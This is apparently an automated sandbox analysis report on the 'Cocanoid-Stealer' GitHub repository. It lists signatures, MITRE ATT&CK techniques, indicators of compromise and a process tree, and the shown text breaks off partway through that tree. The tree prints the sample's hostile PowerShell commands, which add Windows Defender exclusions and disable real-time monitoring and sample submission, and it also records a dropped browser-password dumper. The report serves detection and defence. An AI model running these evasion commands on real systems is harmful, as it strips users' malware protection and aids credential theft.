hxxps://github[.]com/AhmedSakrr/Cocanoid-Stealer

Analysis

max time kernel
58s
max time network
61s
platform
windows10-2004_x64
resource
win10v2004-20240426-en
resource tags

arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
submitted
19/05/2024, 23:56

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

https://github.com/AhmedSakrr/Cocanoid-Stealer

Score

9^/10

execution spyware stealer upx

Malware Config

Signatures

NirSoft WebBrowserPassView 1 IoCs

Password recovery tool for various web browsers

resource	yara_rule
behavioral1/memory/7156-444-0x0000000000400000-0x0000000000484000-memory.dmp	WebBrowserPassView

Nirsoft 1 IoCs

resource	yara_rule
behavioral1/memory/7156-444-0x0000000000400000-0x0000000000484000-memory.dmp	Nirsoft

Command and Scripting Interpreter: PowerShell 1 TTPs 9 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
3064	powershell.exe
6756	powershell.exe
6220	powershell.exe
1124	powershell.exe
5700	powershell.exe
2212	powershell.exe
5292	powershell.exe
6672	powershell.exe
5564	powershell.exe

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Builder.exe

Executes dropped EXE 1 IoCs

pid	Process
7156	getPass.exe

Loads dropped DLL 37 IoCs

pid	Process
6136	Builder.exe
6136	Builder.exe
6136	Builder.exe
6136	Builder.exe
6136	Builder.exe
6136	Builder.exe
6136	Builder.exe
6136	Builder.exe
6136	Builder.exe
6136	Builder.exe
6136	Builder.exe
6136	Builder.exe
6136	Builder.exe
6136	Builder.exe
6136	Builder.exe
6136	Builder.exe
6136	Builder.exe
6136	Builder.exe
6136	Builder.exe
5840	UPX.exe
5840	UPX.exe
5840	UPX.exe
5840	UPX.exe
5840	UPX.exe
5840	UPX.exe
5840	UPX.exe
5840	UPX.exe
5840	UPX.exe
5840	UPX.exe
5840	UPX.exe
5840	UPX.exe
5840	UPX.exe
5840	UPX.exe
5840	UPX.exe
5840	UPX.exe
5840	UPX.exe
5840	UPX.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

UPX packed file 64 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x000700000002382f-266.dat	upx
behavioral1/memory/6136-270-0x00007FFF4CE60000-0x00007FFF4D2CE000-memory.dmp	upx
behavioral1/files/0x0007000000023828-273.dat	upx
behavioral1/memory/6136-274-0x00007FFF61580000-0x00007FFF615AD000-memory.dmp	upx
behavioral1/files/0x0007000000023825-276.dat	upx
behavioral1/memory/6136-277-0x00007FFF61FE0000-0x00007FFF61FF9000-memory.dmp	upx
behavioral1/memory/6136-280-0x00007FFF511D0000-0x00007FFF511E9000-memory.dmp	upx
behavioral1/files/0x0007000000023832-281.dat	upx
behavioral1/files/0x000700000002382e-286.dat	upx
behavioral1/memory/6136-288-0x00007FFF4ED00000-0x00007FFF4ED2E000-memory.dmp	upx
behavioral1/files/0x000700000002382d-291.dat	upx
behavioral1/memory/6136-293-0x00007FFF4CA20000-0x00007FFF4CD97000-memory.dmp	upx
behavioral1/memory/6136-292-0x00007FFF4CDA0000-0x00007FFF4CE57000-memory.dmp	upx
behavioral1/memory/6136-287-0x00007FFF62190000-0x00007FFF6219D000-memory.dmp	upx
behavioral1/files/0x000700000002382c-284.dat	upx
behavioral1/files/0x000700000002382a-279.dat	upx
behavioral1/files/0x0007000000023827-296.dat	upx
behavioral1/files/0x0007000000023829-298.dat	upx
behavioral1/files/0x000700000002382b-300.dat	upx
behavioral1/memory/6136-305-0x00007FFF4CA00000-0x00007FFF4CA1F000-memory.dmp	upx
behavioral1/memory/6136-306-0x00007FFF4C890000-0x00007FFF4C9F9000-memory.dmp	upx
behavioral1/files/0x0007000000023833-304.dat	upx
behavioral1/memory/6136-303-0x00007FFF61850000-0x00007FFF6185D000-memory.dmp	upx
behavioral1/memory/6136-302-0x00007FFF4F120000-0x00007FFF4F134000-memory.dmp	upx
behavioral1/files/0x0007000000023820-308.dat	upx
behavioral1/files/0x0007000000023831-313.dat	upx
behavioral1/memory/6136-316-0x00007FFF4C5E0000-0x00007FFF4C60F000-memory.dmp	upx
behavioral1/memory/6136-315-0x00007FFF4C610000-0x00007FFF4C63B000-memory.dmp	upx
behavioral1/files/0x0007000000023835-312.dat	upx
behavioral1/memory/6136-311-0x00007FFF4C640000-0x00007FFF4C890000-memory.dmp	upx
behavioral1/memory/6136-309-0x00007FFF4CE60000-0x00007FFF4D2CE000-memory.dmp	upx
behavioral1/files/0x0007000000023834-365.dat	upx
behavioral1/memory/6136-366-0x00007FFF61580000-0x00007FFF615AD000-memory.dmp	upx
behavioral1/memory/6136-367-0x00007FFF4C4C0000-0x00007FFF4C5D8000-memory.dmp	upx
behavioral1/files/0x0007000000023826-383.dat	upx
behavioral1/memory/6136-384-0x00007FFF50A00000-0x00007FFF50A42000-memory.dmp	upx
behavioral1/memory/6136-425-0x00007FFF511D0000-0x00007FFF511E9000-memory.dmp	upx
behavioral1/memory/6136-486-0x00007FFF4ED00000-0x00007FFF4ED2E000-memory.dmp	upx
behavioral1/memory/6136-498-0x00007FFF4C890000-0x00007FFF4C9F9000-memory.dmp	upx
behavioral1/memory/6136-504-0x00007FFF4CDA0000-0x00007FFF4CE57000-memory.dmp	upx
behavioral1/memory/6136-505-0x00007FFF4CA20000-0x00007FFF4CD97000-memory.dmp	upx
behavioral1/memory/6136-503-0x00007FFF50A00000-0x00007FFF50A42000-memory.dmp	upx
behavioral1/memory/6136-502-0x00007FFF4C4C0000-0x00007FFF4C5D8000-memory.dmp	upx
behavioral1/memory/6136-501-0x00007FFF4C5E0000-0x00007FFF4C60F000-memory.dmp	upx
behavioral1/memory/6136-500-0x00007FFF4C610000-0x00007FFF4C63B000-memory.dmp	upx
behavioral1/memory/6136-499-0x00007FFF4C640000-0x00007FFF4C890000-memory.dmp	upx
behavioral1/memory/6136-497-0x00007FFF4CA00000-0x00007FFF4CA1F000-memory.dmp	upx
behavioral1/memory/6136-487-0x00007FFF4CE60000-0x00007FFF4D2CE000-memory.dmp	upx
behavioral1/memory/5840-557-0x00007FFF4C050000-0x00007FFF4C4BE000-memory.dmp	upx
behavioral1/memory/5840-558-0x00007FFF4D660000-0x00007FFF4D68D000-memory.dmp	upx
behavioral1/memory/5840-559-0x00007FFF4D640000-0x00007FFF4D659000-memory.dmp	upx
behavioral1/memory/5840-561-0x00007FFF61570000-0x00007FFF6157D000-memory.dmp	upx
behavioral1/memory/5840-560-0x00007FFF4D620000-0x00007FFF4D639000-memory.dmp	upx
behavioral1/memory/5840-562-0x00007FFF4D5F0000-0x00007FFF4D61E000-memory.dmp	upx
behavioral1/memory/5840-563-0x00007FFF4D530000-0x00007FFF4D5E7000-memory.dmp	upx
behavioral1/memory/5840-564-0x00007FFF4AAA0000-0x00007FFF4AE17000-memory.dmp	upx
behavioral1/memory/5840-567-0x00007FFF5EA60000-0x00007FFF5EA6D000-memory.dmp	upx
behavioral1/memory/5840-566-0x00007FFF4D510000-0x00007FFF4D524000-memory.dmp	upx
behavioral1/memory/5840-568-0x00007FFF4D4F0000-0x00007FFF4D50F000-memory.dmp	upx
behavioral1/memory/5840-569-0x00007FFF4BEE0000-0x00007FFF4C049000-memory.dmp	upx
behavioral1/memory/5840-570-0x00007FFF4BAC0000-0x00007FFF4BD10000-memory.dmp	upx
behavioral1/memory/5840-571-0x00007FFF4C050000-0x00007FFF4C4BE000-memory.dmp	upx
behavioral1/memory/5840-573-0x00007FFF4D490000-0x00007FFF4D4BF000-memory.dmp	upx
behavioral1/memory/5840-572-0x00007FFF4D4C0000-0x00007FFF4D4EB000-memory.dmp	upx

Legitimate hosting services abused for malware hosting/C2 1 TTPs 9 IoCs

Web Service

T1102

flow	ioc
31	camo.githubusercontent.com
32	camo.githubusercontent.com
33	camo.githubusercontent.com
34	camo.githubusercontent.com
61	raw.githubusercontent.com
28	camo.githubusercontent.com
30	camo.githubusercontent.com
35	camo.githubusercontent.com
62	raw.githubusercontent.com

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
81	ip-api.com
102	ip-api.com

Detects videocard installed 1 TTPs 4 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
4228	WMIC.exe
2280	WMIC.exe
4100	WMIC.exe
2812	WMIC.exe

Enumerates processes with tasklist 1 TTPs 3 IoCs

Process Discovery

T1057

pid	Process
5936	tasklist.exe
5704	tasklist.exe
6416	tasklist.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
4612	systeminfo.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings	msedge.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 45 IoCs

pid	Process
752	msedge.exe
752	msedge.exe
3472	msedge.exe
3472	msedge.exe
4064	identity_helper.exe
4064	identity_helper.exe
5176	msedge.exe
5176	msedge.exe
5564	powershell.exe
5564	powershell.exe
5700	powershell.exe
5700	powershell.exe
5732	powershell.exe
5732	powershell.exe
5564	powershell.exe
5732	powershell.exe
5700	powershell.exe
2212	powershell.exe
2212	powershell.exe
2212	powershell.exe
3064	powershell.exe
3064	powershell.exe
3064	powershell.exe
4252	powershell.exe
4252	powershell.exe
5292	powershell.exe
5292	powershell.exe
4252	powershell.exe
5292	powershell.exe
7156	getPass.exe
7156	getPass.exe
7156	getPass.exe
7156	getPass.exe
6672	powershell.exe
6672	powershell.exe
6672	powershell.exe
6812	powershell.exe
6812	powershell.exe
6756	powershell.exe
6756	powershell.exe
6812	powershell.exe
6756	powershell.exe
6220	powershell.exe
6220	powershell.exe
6220	powershell.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs

pid	Process
3472	msedge.exe
3472	msedge.exe
3472	msedge.exe
3472	msedge.exe
3472	msedge.exe
3472	msedge.exe
3472	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	5564	powershell.exe
Token: SeDebugPrivilege	5700	powershell.exe
Token: SeDebugPrivilege	5732	powershell.exe
Token: SeDebugPrivilege	2212	powershell.exe
Token: SeIncreaseQuotaPrivilege	5952	WMIC.exe
Token: SeSecurityPrivilege	5952	WMIC.exe
Token: SeTakeOwnershipPrivilege	5952	WMIC.exe
Token: SeLoadDriverPrivilege	5952	WMIC.exe
Token: SeSystemProfilePrivilege	5952	WMIC.exe
Token: SeSystemtimePrivilege	5952	WMIC.exe
Token: SeProfSingleProcessPrivilege	5952	WMIC.exe
Token: SeIncBasePriorityPrivilege	5952	WMIC.exe
Token: SeCreatePagefilePrivilege	5952	WMIC.exe
Token: SeBackupPrivilege	5952	WMIC.exe
Token: SeRestorePrivilege	5952	WMIC.exe
Token: SeShutdownPrivilege	5952	WMIC.exe
Token: SeDebugPrivilege	5952	WMIC.exe
Token: SeSystemEnvironmentPrivilege	5952	WMIC.exe
Token: SeRemoteShutdownPrivilege	5952	WMIC.exe
Token: SeUndockPrivilege	5952	WMIC.exe
Token: SeManageVolumePrivilege	5952	WMIC.exe
Token: 33	5952	WMIC.exe
Token: 34	5952	WMIC.exe
Token: 35	5952	WMIC.exe
Token: 36	5952	WMIC.exe
Token: SeDebugPrivilege	5936	tasklist.exe
Token: SeIncreaseQuotaPrivilege	5952	WMIC.exe
Token: SeSecurityPrivilege	5952	WMIC.exe
Token: SeTakeOwnershipPrivilege	5952	WMIC.exe
Token: SeLoadDriverPrivilege	5952	WMIC.exe
Token: SeSystemProfilePrivilege	5952	WMIC.exe
Token: SeSystemtimePrivilege	5952	WMIC.exe
Token: SeProfSingleProcessPrivilege	5952	WMIC.exe
Token: SeIncBasePriorityPrivilege	5952	WMIC.exe
Token: SeCreatePagefilePrivilege	5952	WMIC.exe
Token: SeBackupPrivilege	5952	WMIC.exe
Token: SeRestorePrivilege	5952	WMIC.exe
Token: SeShutdownPrivilege	5952	WMIC.exe
Token: SeDebugPrivilege	5952	WMIC.exe
Token: SeSystemEnvironmentPrivilege	5952	WMIC.exe
Token: SeRemoteShutdownPrivilege	5952	WMIC.exe
Token: SeUndockPrivilege	5952	WMIC.exe
Token: SeManageVolumePrivilege	5952	WMIC.exe
Token: 33	5952	WMIC.exe
Token: 34	5952	WMIC.exe
Token: 35	5952	WMIC.exe
Token: 36	5952	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2812	WMIC.exe
Token: SeSecurityPrivilege	2812	WMIC.exe
Token: SeTakeOwnershipPrivilege	2812	WMIC.exe
Token: SeLoadDriverPrivilege	2812	WMIC.exe
Token: SeSystemProfilePrivilege	2812	WMIC.exe
Token: SeSystemtimePrivilege	2812	WMIC.exe
Token: SeProfSingleProcessPrivilege	2812	WMIC.exe
Token: SeIncBasePriorityPrivilege	2812	WMIC.exe
Token: SeCreatePagefilePrivilege	2812	WMIC.exe
Token: SeBackupPrivilege	2812	WMIC.exe
Token: SeRestorePrivilege	2812	WMIC.exe
Token: SeShutdownPrivilege	2812	WMIC.exe
Token: SeDebugPrivilege	2812	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2812	WMIC.exe
Token: SeRemoteShutdownPrivilege	2812	WMIC.exe
Token: SeUndockPrivilege	2812	WMIC.exe
Token: SeManageVolumePrivilege	2812	WMIC.exe

Suspicious use of FindShellTrayWindow 38 IoCs

pid	Process
3472	msedge.exe
3472	msedge.exe
3472	msedge.exe
3472	msedge.exe
3472	msedge.exe
3472	msedge.exe
3472	msedge.exe
3472	msedge.exe
3472	msedge.exe
3472	msedge.exe
3472	msedge.exe
3472	msedge.exe
3472	msedge.exe
3472	msedge.exe
3472	msedge.exe
3472	msedge.exe
3472	msedge.exe
3472	msedge.exe
3472	msedge.exe
3472	msedge.exe
3472	msedge.exe
3472	msedge.exe
3472	msedge.exe
3472	msedge.exe
3472	msedge.exe
3472	msedge.exe
3472	msedge.exe
3472	msedge.exe
3472	msedge.exe
3472	msedge.exe
3472	msedge.exe
3472	msedge.exe
3472	msedge.exe
3472	msedge.exe
3472	msedge.exe
3472	msedge.exe
3472	msedge.exe
3472	msedge.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
3472	msedge.exe
3472	msedge.exe
3472	msedge.exe
3472	msedge.exe
3472	msedge.exe
3472	msedge.exe
3472	msedge.exe
3472	msedge.exe
3472	msedge.exe
3472	msedge.exe
3472	msedge.exe
3472	msedge.exe
3472	msedge.exe
3472	msedge.exe
3472	msedge.exe
3472	msedge.exe
3472	msedge.exe
3472	msedge.exe
3472	msedge.exe
3472	msedge.exe
3472	msedge.exe
3472	msedge.exe
3472	msedge.exe
3472	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3472 wrote to memory of 980	3472	msedge.exe	82
PID 3472 wrote to memory of 980	3472	msedge.exe	82
PID 3472 wrote to memory of 2332	3472	msedge.exe	83
PID 3472 wrote to memory of 2332	3472	msedge.exe	83
PID 3472 wrote to memory of 2332	3472	msedge.exe	83
PID 3472 wrote to memory of 2332	3472	msedge.exe	83
PID 3472 wrote to memory of 2332	3472	msedge.exe	83
PID 3472 wrote to memory of 2332	3472	msedge.exe	83
PID 3472 wrote to memory of 2332	3472	msedge.exe	83
PID 3472 wrote to memory of 2332	3472	msedge.exe	83
PID 3472 wrote to memory of 2332	3472	msedge.exe	83
PID 3472 wrote to memory of 2332	3472	msedge.exe	83
PID 3472 wrote to memory of 2332	3472	msedge.exe	83
PID 3472 wrote to memory of 2332	3472	msedge.exe	83
PID 3472 wrote to memory of 2332	3472	msedge.exe	83
PID 3472 wrote to memory of 2332	3472	msedge.exe	83
PID 3472 wrote to memory of 2332	3472	msedge.exe	83
PID 3472 wrote to memory of 2332	3472	msedge.exe	83
PID 3472 wrote to memory of 2332	3472	msedge.exe	83
PID 3472 wrote to memory of 2332	3472	msedge.exe	83
PID 3472 wrote to memory of 2332	3472	msedge.exe	83
PID 3472 wrote to memory of 2332	3472	msedge.exe	83
PID 3472 wrote to memory of 2332	3472	msedge.exe	83
PID 3472 wrote to memory of 2332	3472	msedge.exe	83
PID 3472 wrote to memory of 2332	3472	msedge.exe	83
PID 3472 wrote to memory of 2332	3472	msedge.exe	83
PID 3472 wrote to memory of 2332	3472	msedge.exe	83
PID 3472 wrote to memory of 2332	3472	msedge.exe	83
PID 3472 wrote to memory of 2332	3472	msedge.exe	83
PID 3472 wrote to memory of 2332	3472	msedge.exe	83
PID 3472 wrote to memory of 2332	3472	msedge.exe	83
PID 3472 wrote to memory of 2332	3472	msedge.exe	83
PID 3472 wrote to memory of 2332	3472	msedge.exe	83
PID 3472 wrote to memory of 2332	3472	msedge.exe	83
PID 3472 wrote to memory of 2332	3472	msedge.exe	83
PID 3472 wrote to memory of 2332	3472	msedge.exe	83
PID 3472 wrote to memory of 2332	3472	msedge.exe	83
PID 3472 wrote to memory of 2332	3472	msedge.exe	83
PID 3472 wrote to memory of 2332	3472	msedge.exe	83
PID 3472 wrote to memory of 2332	3472	msedge.exe	83
PID 3472 wrote to memory of 2332	3472	msedge.exe	83
PID 3472 wrote to memory of 2332	3472	msedge.exe	83
PID 3472 wrote to memory of 752	3472	msedge.exe	84
PID 3472 wrote to memory of 752	3472	msedge.exe	84
PID 3472 wrote to memory of 4208	3472	msedge.exe	85
PID 3472 wrote to memory of 4208	3472	msedge.exe	85
PID 3472 wrote to memory of 4208	3472	msedge.exe	85
PID 3472 wrote to memory of 4208	3472	msedge.exe	85
PID 3472 wrote to memory of 4208	3472	msedge.exe	85
PID 3472 wrote to memory of 4208	3472	msedge.exe	85
PID 3472 wrote to memory of 4208	3472	msedge.exe	85
PID 3472 wrote to memory of 4208	3472	msedge.exe	85
PID 3472 wrote to memory of 4208	3472	msedge.exe	85
PID 3472 wrote to memory of 4208	3472	msedge.exe	85
PID 3472 wrote to memory of 4208	3472	msedge.exe	85
PID 3472 wrote to memory of 4208	3472	msedge.exe	85
PID 3472 wrote to memory of 4208	3472	msedge.exe	85
PID 3472 wrote to memory of 4208	3472	msedge.exe	85
PID 3472 wrote to memory of 4208	3472	msedge.exe	85
PID 3472 wrote to memory of 4208	3472	msedge.exe	85
PID 3472 wrote to memory of 4208	3472	msedge.exe	85
PID 3472 wrote to memory of 4208	3472	msedge.exe	85
PID 3472 wrote to memory of 4208	3472	msedge.exe	85
PID 3472 wrote to memory of 4208	3472	msedge.exe	85

Views/modifies file attributes 1 TTPs 2 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
3352	attrib.exe
6420	attrib.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://github.com/AhmedSakrr/Cocanoid-Stealer
1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3472
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fff61f746f8,0x7fff61f74708,0x7fff61f74718
  2⤵
  PID:980
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1996,11129733973174607252,1743729337990311022,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2120 /prefetch:2
  2⤵
  PID:2332
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1996,11129733973174607252,1743729337990311022,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2456 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:752
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1996,11129733973174607252,1743729337990311022,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2712 /prefetch:8
  2⤵
  PID:4208
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,11129733973174607252,1743729337990311022,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3356 /prefetch:1
  2⤵
  PID:4608
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,11129733973174607252,1743729337990311022,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3408 /prefetch:1
  2⤵
  PID:3036
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1996,11129733973174607252,1743729337990311022,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5984 /prefetch:8
  2⤵
  PID:2796
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1996,11129733973174607252,1743729337990311022,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5984 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4064
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,11129733973174607252,1743729337990311022,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5708 /prefetch:1
  2⤵
  PID:4668
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,11129733973174607252,1743729337990311022,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5348 /prefetch:1
  2⤵
  PID:4544
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,11129733973174607252,1743729337990311022,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3456 /prefetch:1
  2⤵
  PID:2064
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,11129733973174607252,1743729337990311022,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3368 /prefetch:1
  2⤵
  PID:1368
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=1996,11129733973174607252,1743729337990311022,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5520 /prefetch:8
  2⤵
  PID:3032
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,11129733973174607252,1743729337990311022,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5500 /prefetch:1
  2⤵
  PID:1016
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1996,11129733973174607252,1743729337990311022,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5628 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:5176

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1276

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4744

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:5560

C:\Users\Admin\Downloads\Cocanoid Builder\Cocanoid\Builder.exe
"C:\Users\Admin\Downloads\Cocanoid Builder\Cocanoid\Builder.exe"
1⤵
PID:5960
- C:\Users\Admin\Downloads\Cocanoid Builder\Cocanoid\Builder.exe
  "C:\Users\Admin\Downloads\Cocanoid Builder\Cocanoid\Builder.exe"
  2⤵
  - Drops file in Drivers directory
  - Loads dropped DLL
  PID:6136
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Unblock-File '.\Builder.exe'"
    3⤵
    PID:1808
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Unblock-File '.\Builder.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:5564
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "net session"
    3⤵
    PID:2616
  - - C:\Windows\system32\net.exe
      net session
      4⤵
      PID:5568
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 session
        5⤵
        
        PID:3588
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\Cocanoid Builder\Cocanoid\Builder.exe'"
    3⤵
    PID:940
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\Cocanoid Builder\Cocanoid\Builder.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:5700
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2"
    3⤵
    PID:3680
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
